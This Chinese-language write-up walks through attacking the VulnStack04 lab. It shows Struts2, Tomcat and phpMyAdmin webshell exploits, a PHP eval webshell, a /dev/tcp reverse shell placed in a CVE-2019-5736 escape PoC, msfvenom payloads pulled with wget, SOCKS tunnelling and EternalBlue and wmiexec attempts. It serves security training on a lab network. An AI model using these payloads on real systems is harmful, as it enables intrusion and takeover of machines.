【渗透测试】VulnStack04

技术文章

VulnStack04

一、环境配置

0x01 模式配置

环境概览:

1
2
3
4
5
6
7
kali  :192.168.40.129

ubuntu:公网192.168.40.128 内网192.168.183.128

win7  :内网192.168.183.129

DC    :内网192.168.183.130

注意:

需提前修改虚拟机网络,使得网卡1在183段:

vul

0x02 服务配置

接着还需要在ubuntu机器开启脆弱性服务:

1
2
3
4
5
6
7
8
9
10
11
cd /home/ubuntu/Desktop/vulhub/struts2/s2-045

sudo docker-compose up -d

cd /home/ubuntu/Desktop/vulhub/tomcat/CVE-2017-12615

sudo docker-compose up -d

cd /home/ubuntu/Desktop/vulhub/phpmyadmin/CVE-2018-12613

sudo docker-compose up -d

20220506

二、渗透测试

0x01 信息收集

仅得到一个IP地址,查看开放哪些端口:

1
2
3
4
5
6
7
8
9
10
11
12
udo nmap -sS -sV -Pn -T 4 192.168.40.128

Nmap scan report for 192.168.40.128
Host is up (0.000047s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
2001/tcp open  http    Jetty 9.2.11.v20150529
2002/tcp open  http    Apache Tomcat 8.5.19
2003/tcp open  http    Apache httpd 2.4.25 ((Debian))
MAC Address: 00:0C:29:32:AB:01 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

20220506

可以看到目标机器开放了四个端口

0x02 发现思路

根据得到的端口信息,此时思路有两个:

  • 针对22端口SSH爆破;
  • 访问不同Web服务端口,进一步收集信息

0x03 GetShell

首先第一个思路,针对22端口进行SSH爆破,如果字典足够强大或者目标机器存在弱口令,那么我们就会直接获得登录信息:

20220506

使用口令进行远程登录,直接获取到一台机器:

20220506

当然,实战中要判断是否是蜜罐。

第二个思路,访问不同的web端口,查看具体服务继续收集信息:

2001端口Struts2 GetShell:

20220506

为一上传页面,通过Finger指纹扫描,得到为Struts2 Showcase :

20220506

使用专项漏洞检测工具扫描,结果显示目标存在S2-045漏洞:

20220506

尝试执行命令,成功:

20220506

ifconfig查看IP信息,失败,提示/bin/bash: ifconfig: command not found

20220506

接着尝试上传Webshell文件,上传到指定目录/usr/src/src/main/webapp/temp1.jsp

20220506

访问网页,页面空白,说明上传成功:

20220506

冰蝎连接GetShell:

20220506

得到root权限:

20220506

ping DNSLog确认目标处于出网状态:

20220506

2002端口Tomcat GetShell:

端口服务Tomcat默认页面:

20220506

manage页面403:

20220506

使用Nuclei自动扫描,显示存在CVE-2017-12615 Tomcat文件上传漏洞:

20220506

然后抓包写入冰蝎马GetShell,不再赘述。

2003端口phpMyadmin GetShell:

访问2003端口页面,未授权直接进入后台,版本为4.8.1:

20220506

首先想到利用4.8.1文件读取GetShell:

1
http://192.168.40.128:2003/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

20220506

1
2
3
SHOW VARIABLES LIKE 'general%';

SET GLOBAL general_log='on';

但是无法执行第二条语句,提示权限不足:

20220506

换用其他方式:

1
2
3
4
5
6
7
8
9
10
11
12
13
//sess_后面的字段为Cookie中的phpMyadmin值Cookie: JSESSIONID=D2708E458170423AAF30900487729C84; pma_lang=zh_CN; phpMyAdmin=164066fc245614fc500901868bac04b5

select '<?php phpinfo()?>';

http://192.168.40.128:2003/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_164066fc245614fc500901868bac04b5

//此时得到目标网站根目录/var/www/html/

select "<?php file_put_contents('/var/www/html/shell.php','<?php @eval($_POST[cmd]);?>')?>"

http://192.168.40.128:2003/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_164066fc245614fc500901868bac04b5

http://192.168.40.128:2003/shell.php

20220506

20220506

蚁剑连接GetShell:

20220506

0x04 Docker逃逸

拿到Shell后,根据ifconfig无法执行,尝试执行ls -alh /.dockerenv判断是否为docker容器:

1
2
/usr/src/ >ls -alh /.dockerenv
-rwxr-xr-x 1 root root 0 Jan 22  2020 /.dockerenv

结果显示存在.dockerenv文件,判断当前Shell为docker容器,需要进行逃逸。

尝试dirty cawl逃逸,失败:

1
2
3
4
5
git clone https://github.com/scumjr/dirtycow-vdso.git

cd /dirtycow-vdso/

make

20220506

上传CDK工具,运行cdk evaluate —full信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
[Information Gathering - System Info]
2022/04/17 11:14:03 current dir: /
2022/04/17 11:14:03 current user: root uid: 0 gid: 0 home: /root
2022/04/17 11:14:03 hostname: 174745108fcb
2022/04/17 11:14:03 debian debian 9.11 kernel: 4.4.0-142-generic

[Information Gathering - Services]
2022/04/17 11:14:03 service found in process:
        1       0       java
2022/04/17 11:14:03 service found in process:
        164     1       python
2022/04/17 11:14:03 service found in process:
        256     254     python

[Information Gathering - Commands and Capabilities]
2022/04/17 11:14:03 available commands:
        curl,wget,find,ps,java,python,apt,dpkg,ssh,git,svn,mount,fdisk,base64,python2,python2.7,perl
2022/04/17 11:14:03 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
        CapInh: 00000000a80425fb
        CapPrm: 00000000a80425fb
        CapEff: 00000000a80425fb
        CapBnd: 00000000a80425fb
        CapAmb: 0000000000000000
        Cap decode: 0x00000000a80425fb = CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_MKNOD,CAP_AUDIT_WRITE,CAP_SETFCAP
        Add capability list: 
[*] Maybe you can exploit the Capabilities below:

[Information Gathering - Mounts]

[Information Gathering - Net Namespace]
        container net namespace isolated.

[Information Gathering - Sysctl Variables]
2022/04/17 11:14:03 net.ipv4.conf.all.route_localnet = 0

[Discovery - K8s API Server]
2022/04/17 11:14:03 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
        api-server forbids anonymous request.
        response:

[Discovery - K8s Service Account]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory

[Discovery - Cloud Provider Metadata API]
2022/04/17 11:14:04 failed to dial Alibaba Cloud API.
2022/04/17 11:14:04 failed to dial Azure API.
2022/04/17 11:14:04 failed to dial Google Cloud API.
2022/04/17 11:14:05 failed to dial Tencent Cloud API.
2022/04/17 11:14:05 failed to dial OpenStack API.
2022/04/17 11:14:05 failed to dial Amazon Web Services (AWS) API.
2022/04/17 11:14:06 failed to dial ucloud API.

[Information Gathering - Sensitive Files]
        .dockerenv - /.dockerenv
        /.bashrc - /etc/skel/.bashrc
        /.bashrc - /root/.bashrc

[Information Gathering - ASLR]
2022/04/17 11:14:06 /proc/sys/kernel/randomize_va_space file content: 2
2022/04/17 11:14:06 ASLR is enabled.

[Information Gathering - Cgroups]
2022/04/17 11:14:06 /proc/1/cgroup file content:
        13:name=systemd:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
        12:pids:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
        11:hugetlb:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
        10:net_prio:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
        9:perf_event:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
        8:net_cls:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
        7:freezer:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
        6:devices:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
        5:memory:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
        4:blkio:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
        3:cpuacct:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
        2:cpu:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
        1:cpuset:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773

尝试利用cdk runc-pwn进行CVE-2019-5736进行逃逸,但仍然失败,报错cannot find RunC process inside container

查看其他师傅的文章,5736需要目标机器exec进入docker容器触发。

本着尽量不交互得想法,尝试其他几种逃逸方法,均失败,,只能通过5736模拟管理员exec进入容器:

1
2
3
4
5
6
7
8
9
git clone https://github.com/Frichetten/CVE-2019-5736-PoC.git

cd CVE-2019-5736-PoC

vim main.go

#!/bin/bash \n bash -i >& /dev/tcp/192.168.40.129/6666 0>&1

go build main.go

20220506

将编译好的main文件利用冰蝎上传,并加权运行

20220506

但不知道什么原因,宿主机也执行了exec,但是仍然无法反弹Shell,payload是一样的,心态很难受。。。。。

暂时放弃逃逸,直接利用SSH弱密码登录主机,,,,,

0x05 横向移动

ifconfig查看内网网段192.168.183.0/24

20220506

msf生成shell上传到宿主机执行获取meterpreter,上传ew穿透工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.40.129 LPORT=9999 -f elf > shell.elf

python3 -m http.server 6555

宿主机加权执行./ew_for_linux64 -s rssocks -d vps -e 8888

kali攻击端执行./ew_for_linux64 -s rcsocks -l 1080 -e 8888

修改proxychains配置文件为sock4 127.0.0.1 1080

sudo proxychains msfconsole

use exploit/multi/handler

set lhost 192.168.40.129

set lport 9999

set payload linux/x86/meterpreter/reverse_tcp

run

//宿主机执行:
wget http://192.168.40.129:6555/shell.elf

chmod 777 shell.elf

./shell.elf

20220506

接着收集内网信息,得到内网存活主机192.168.183.130/131:

1
2
3
4
5
6
7
8
9
run autoroute -s 192.168.183.0/24

use auxiliary/scanner/discovery/udp_probe

set rhosts 192.168.183.0-255

set threads 20

run

20220506

对存活主机进行端口扫描,两台主机均开放445端口,且一台为winserver2008,一台为win7,可以判断130为域控,131为域内成员主机:

1
sudo proxychains nmap -sS -sV -T 4 -p22,80,445,1433,3306 192.168.183.130 192.168.183.131

20220506

使用nmap进行445漏洞扫描,得到两台机器均存在MS17-010漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
sudo proxychains nmap -sS -sV -T 4 -p 445 --script=vuln 192.168.183.130 192.168.183.131

Nmap scan report for 192.168.183.130
Host is up (0.00059s latency).

PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: DEMO)
Service Info: Host: WIN-ENS2VR5TR3N; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap scan report for 192.168.183.131
Host is up (0.00053s latency).

PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: DEMO)
Service Info: Host: TESTWIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 45.49 seconds

或者上传fscan进行内网扫描:

20220506

模块利用,但失败,其他师傅都直接打进去,尝试挂了socks代理也同样无法利用,不知道是哪里出现问题:

1
2
3
4
5
6
7
use exploit/windows/smb/ms17_010_eternalblue

set rhost 192.168.183.134

set payload windows/meterpreter/bind_tcp

exploit

20220506

在ubuntu机器执行cat .bash_history | grep 192.168.183命令得到一个密码:douser:Dotest123

20220506

尝试利用wmiexec获取权限,仍然失败,,,,在想是不是靶机环境存在什么问题。。。。:

1
2
3
4
5
./ew -s rcsocks -l 1080 -e 8888

./ew -s rssocks -d 192.168.40.130 -e 8888

proxychains python3 wmiexec.py -debug "douser@Dotest123@192.168.183.134"

20220506

查了很多师傅的博客,有直接打进去的,也有很多和我一样怎么都进不去的。win7和server2008均不出网,只能算是个失败的经历。。。